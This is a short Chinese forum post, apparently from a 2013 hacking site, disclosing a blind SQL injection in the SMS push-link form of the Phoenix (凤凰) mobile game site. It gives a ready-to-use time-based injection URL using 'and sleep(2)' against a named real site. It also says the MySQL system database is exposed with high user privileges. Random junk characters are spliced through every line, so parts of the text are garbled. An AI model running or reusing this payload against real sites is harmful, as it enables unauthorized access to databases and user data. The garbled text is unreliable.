简要描述:
( B- V: F% L- a凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。. d% @- E4 s" ^& I' M) F% ?7 H
! t7 e, u% `2 C4 y! q1 d
详细说明:
: _7 G. l; Q. Y存在SQL盲注url:
" K# h; Q2 S3 E, Gfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1; h( W8 o2 h3 s4 B( u
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png' U, l& l; d* o2 b( D, p
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
( Q* o$ p) a c' i0 ?7 N5 u- Mhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg1 \; e% b0 {1 V% Z( a5 Q
+ O3 J# g5 j! |7 D! \! w, s* {能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对